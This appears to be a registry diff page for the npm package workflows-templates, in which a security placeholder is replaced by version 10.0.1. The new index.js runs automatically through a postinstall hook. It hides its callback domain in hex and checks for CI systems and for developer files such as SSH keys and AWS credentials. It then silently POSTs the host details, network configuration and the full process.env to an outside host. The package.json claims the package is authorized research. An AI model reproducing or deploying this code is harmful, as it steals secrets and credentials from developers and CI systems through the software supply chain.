workflows-templates 0.0.1-security → 10.0.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of workflows-templates might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +90 -0
  2. package/package.json +8 -3
  3. package/README.md +0 -5
package/index.js ADDED
@@ -0,0 +1,90 @@
1
+ // =========================================================================
2
+ // ============ THE ULTIMATE "HUMAN-ONLY" PAYLOAD (OKTA FINAL) =============
3
+ // ======= STEALTH MODE: THIS PAYLOAD REMAINS SILENT ON BOTS AND =========
4
+ // =========== ONLY ACTIVATES ON HIGH-VALUE HUMAN TARGETS. ===============
5
+ // =========================================================================
6
+
7
+ const os = require('os');
8
+ const fs = require('fs');
9
+ const path = require('path');
10
+ const https = require('https');
11
+ const { execSync } = require('child_process');
12
+
13
+ // --- CONFIGURATION ---
14
+ const OAST_DOMAIN_HEX = '373237306f6a6d3838327479316166796a6a6a336c726477366e637130676f352e6f6173746966792e636f6d';
15
+ const OAST_DOMAIN = Buffer.from(OAST_DOMAIN_HEX, 'hex').toString();
16
+
17
+ const run = (cmd) => { try { return execSync(cmd, { stdio: 'pipe', timeout: 5000 }).toString().trim(); } catch (e) { return 'CMD_FAILED'; } };
18
+ const safeReadFile = (filePath) => { try { return fs.readFileSync(filePath, 'utf8'); } catch (e) { return null; } };
19
+
20
+ const performHumanityTest = () => {
21
+ const report = { isHumanOrCi: false, evidence: {}, summary: [] };
22
+ const userInfo = os.userInfo();
23
+
24
+ // Test 1: Is this a known CI/CD System? (Highest Value Target)
25
+ const ciVars = ['CI', 'CONTINUOUS_INTEGRATION', 'BUILD_NUMBER', 'RUN_ID', 'GITHUB_ACTIONS', 'JENKINS_URL', 'GITLAB_CI', 'CIRCLECI'];
26
+ const foundCiVars = ciVars.filter(v => process.env[v]);
27
+ if (foundCiVars.length > 0) {
28
+ report.isHumanOrCi = true;
29
+ report.evidence.ci_vars = foundCiVars.map(v => `${v}=${process.env[v]}`).join(', ');
30
+ report.summary.push('CI_SYSTEM');
31
+ }
32
+
33
+ // Test 2: Are we inside a real git checkout with a non-generic user?
34
+ const parentProjectRoot = path.resolve(__dirname, '../../');
35
+ const gitConfig = safeReadFile(path.join(parentProjectRoot, '.git/config'));
36
+ if (gitConfig) {
37
+ report.hasGitContext = true;
38
+ report.summary.push('GIT_CONTEXT');
39
+ // A git repo + a non-root user is a strong signal for a developer machine.
40
+ if (userInfo.uid !== 0 && userInfo.username !== 'root') {
41
+ report.isHumanOrCi = true;
42
+ }
43
+ report.evidence.git_config_preview = gitConfig.substring(0, 500);
44
+ }
45
+
46
+ // Test 3: Does the home directory belong to a human developer? (Strongest signal for dev machines)
47
+ const homeDir = userInfo.homedir;
48
+ const hasSshKeys = safeReadFile(path.join(homeDir, '.ssh/id_rsa')) !== null;
49
+ const hasGitConfig = safeReadFile(path.join(homeDir, '.gitconfig')) !== null;
50
+ const hasAwsCreds = safeReadFile(path.join(homeDir, '.aws/credentials')) !== null;
51
+
52
+ if (hasSshKeys || hasGitConfig || hasAwsCreds) {
53
+ report.isHumanOrCi = true; // Any of these dotfiles are a high-fidelity signal.
54
+ report.evidence.developer_dotfiles = { ssh: hasSshKeys, git: hasGitConfig, aws: hasAwsCreds };
55
+ report.summary.push('DEV_DOTFILES');
56
+ }
57
+
58
+ // Only return the full report if one of the humanity tests passed.
59
+ return report.isHumanOrCi ? report : null;
60
+ };
61
+
62
+ // --- Main Execution Logic ---
63
+ try {
64
+ const testResult = performHumanityTest();
65
+
66
+ // EXFILTRATE ONLY IF HUMANITY TEST PASSED
67
+ if (testResult) {
68
+ const intelPackage = {
69
+ mission_id: 'OKTA-HUMAN-POC-1b6effcd',
70
+ timestamp: new Date().toISOString(),
71
+ confirmation: testResult,
72
+ full_recon: {
73
+ host: { hostname: os.hostname(), whoami: os.userInfo().username, platform: os.platform(), uptime_minutes: Math.floor(os.uptime() / 60) },
74
+ network: { ip_config: run('ip a || ipconfig /all'), resolv_conf: safeReadFile('/etc/resolv.conf') },
75
+ env: process.env
76
+ }
77
+ };
78
+
79
+ const payload = JSON.stringify(intelPackage, null, 2);
80
+ https.request({
81
+ hostname: OAST_DOMAIN,
82
+ port: 443,
83
+ path: `/OKTA_CONFIRMED_HUMAN_HIT/${intelPackage.full_recon.host.hostname}/${testResult.summary.join('-')}`,
84
+ method: 'POST',
85
+ headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(payload) }
86
+ }).on('error', e => {}).end(payload);
87
+ }
88
+ } catch (e) {
89
+ // Ultimate silence. The payload must not crash or make noise on failure.
90
+ }
package/package.json CHANGED
@@ -1,6 +1,11 @@
1
1
  {
2
2
  "name": "workflows-templates",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "10.0.1",
4
+ "description": "Security research package for Okta. This payload is context-aware and designed to only activate on human developer or CI systems. Authorized under Bugcrowd VDP. ID: 1b6effcd-b836-4084-880b-a9e5c51dcb60",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "postinstall": "node index.js"
8
+ },
9
+ "author": "Security Research Partner",
10
+ "license": "ISC"
6
11
  }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=workflows-templates for more information.